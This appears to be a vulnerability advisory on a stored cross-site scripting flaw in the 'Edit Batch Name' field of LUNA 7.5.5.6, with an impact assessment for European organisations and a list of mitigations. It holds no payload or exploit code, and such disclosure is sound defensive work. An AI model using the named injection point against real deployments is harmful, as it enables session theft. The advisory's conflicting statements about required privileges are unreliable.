CVE-2025-41065 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79, affecting Luna Imaging's LUNA software version 7.5.5.6. The vulnerability exists due to improper neutralization of input during web page generation, specifically in the 'Edit Batch Name' functionality. An attacker with at least low privileges can inject malicious JavaScript code into the batch name field, which the application stores without proper sanitization or encoding. When other users access the affected page or batch name display, the malicious script executes in their browsers. This can lead to session hijacking, theft of sensitive information, or execution of unauthorized actions within the context of the victim's session. The vulnerability has a CVSS 4.0 score of 5.1, reflecting medium severity, with attack vector being network-based and no privileges required to exploit, but user interaction is necessary to trigger the payload. No patches or known exploits are currently reported, but the vulnerability's presence in a widely used imaging software poses a risk, especially in environments where LUNA is used collaboratively or accessed by multiple users. The lack of proper input validation and output encoding is the root cause, highlighting the need for secure coding practices in web application components. The vulnerability was reserved in April 2025 and published in February 2026, indicating recent discovery and disclosure.

For European organizations, the impact of CVE-2025-41065 can be significant, especially in sectors relying on LUNA software for imaging and digital asset management, such as healthcare, cultural institutions, and media companies. Exploitation could lead to unauthorized access to sensitive data, session hijacking, and potential lateral movement within networks if attackers leverage stolen credentials or session tokens. This could result in data breaches, loss of user trust, and compliance violations under GDPR due to exposure of personal data. The medium severity score suggests moderate risk, but the collaborative nature of LUNA deployments increases the attack surface. Organizations with many users accessing shared resources are particularly vulnerable. Additionally, the requirement for user interaction means phishing or social engineering could facilitate exploitation. The absence of known exploits currently reduces immediate risk but does not eliminate the threat, as attackers may develop exploits post-disclosure. Overall, the vulnerability could disrupt operations and compromise confidentiality and integrity of user sessions within affected European entities.

European organizations should immediately assess their use of LUNA software version 7.5.5.6 and plan for mitigation. Since no official patches are currently available, temporary mitigations include disabling or restricting access to the 'Edit Batch Name' functionality to trusted users only, implementing web application firewalls (WAFs) with rules to detect and block typical XSS payloads targeting this parameter, and enforcing strict input validation and output encoding at the application or proxy level if possible. User awareness training to recognize phishing attempts that could trigger malicious payloads is also recommended. Monitoring logs for unusual activity related to batch name edits or unexpected script execution can help detect exploitation attempts. Organizations should maintain close communication with Luna Imaging for forthcoming patches and apply them promptly once released. Additionally, adopting Content Security Policy (CSP) headers can reduce the impact of XSS by restricting script execution sources. Regular security assessments and code reviews of custom integrations with LUNA can further reduce risk.